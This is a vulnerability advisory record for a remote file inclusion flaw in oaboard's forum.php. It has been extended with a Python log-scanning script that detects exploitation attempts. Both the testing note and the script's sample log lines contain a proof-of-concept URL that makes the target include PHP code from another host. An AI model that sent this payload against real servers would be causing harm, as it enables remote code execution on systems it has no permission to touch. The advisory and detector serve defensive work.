oaboard forum.php Multiple Variable Remote File Inclusion

2006-01-01T04:02:51
ID OSVDB:22219
Type osvdb
Reporter OSVDB
Modified 2006-01-01T04:02:51

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/oaboard_en/forum.php?inc=http://anotherhost/code.php
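
A defender-side check for the request pattern above in web server access logs, as an added example that is not part of the original advisory. The log lines are constructed, and the function names, the log format and the list of URL schemes are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined log format entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL schemes treated as "remote" for this check (assumed list).
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def remote_include_params(log_line, script="forum.php"):
    """Return [(param, value)] for query parameters of `script` whose
    decoded value is a remote URL, as in forum.php?inc=http://..."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/" + script):
        return []
    # The advisory title says multiple variables are affected, so every
    # parameter is checked, not only `inc`. parse_qsl percent-decodes.
    return [(name, value)
            for name, value in parse_qsl(url.query, keep_blank_values=True)
            if REMOTE_SCHEME_RE.match(value)]

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:04:02:51 +0000] '
    '"GET /oaboard_en/forum.php?inc=http://anotherhost/code.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2006:04:03:10 +0000] '
    '"GET /oaboard_en/forum.php?inc=http%3A%2F%2Fanotherhost%2Fcode.php HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2006:04:04:00 +0000] '
    '"GET /oaboard_en/forum.php?topic=12&page=2 HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/Jan/2006:04:05:00 +0000] '
    '"GET /index.php?ref=http://example.org/ HTTP/1.1" 200 1024',
]

def scan(lines):
    """Return (line_number, param, value) for every suspicious parameter."""
    return [(n, p, v) for n, line in enumerate(lines, 1)
            for p, v in remote_include_params(line)]

if __name__ == "__main__":
    for n, p, v in scan(SAMPLE_LOG):
        print(f"line {n}: {p}={v}")
```
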

References:

Secunia Advisory ID: 17373
Other Advisory URL: http://www.evuln.com/vulns/3/summary.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-01/0018.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0670.html
Keyword: EV0003
FrSIRT Advisory: ADV-2006-0028
CVE-2006-0094
CVE-2006-0076
Bugtraq ID: 16105